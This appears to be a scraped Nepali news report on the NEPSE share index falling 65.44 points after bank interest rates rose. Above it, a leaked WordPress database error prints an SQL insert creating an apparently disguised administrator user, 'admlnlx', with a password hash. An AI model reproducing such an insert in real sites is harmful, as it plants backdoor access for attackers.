WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BlZ3xVimr3x0s72jFNKWltsseb3nPA0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 11:16:55', '', 'admlnlx', 'admlnlx')
काठमाडौँ, माघ १७–
बैंक तथा वित्तीय संस्थाको ब्याजदर बढेपछि सेयर बजारमा त्यसको प्रत्यक्ष असर देखिएको छ ।
निरन्तर ओरालो लागेको नेप्से आज ६५.४४ अङ्कले तल झरेर एक हजार ३०९.७० अङ्कमा आइपुगेको छ । आज एक हजार ३७५.४७ अङ्कमा बजार खुलेको थियो ।
आज सबैभन्दा धेरै बिमा समूहका लगानीकर्ताले गुमाएको नेप्सेले उल्लेख गरेको छ । बिमा उपसूचक ८.७ प्रतिशतले घटेको छ । बिमापछि होटल उपसूचक ७.२४, फाइनान्स ५.४८ र बैंकिङ ४.६३ प्रतिशतले घटेका छन् । विकास बैंक, जलविद्युत् र अन्य उपसूचकमा पनि ठूलै कमी आएको छ । –रासस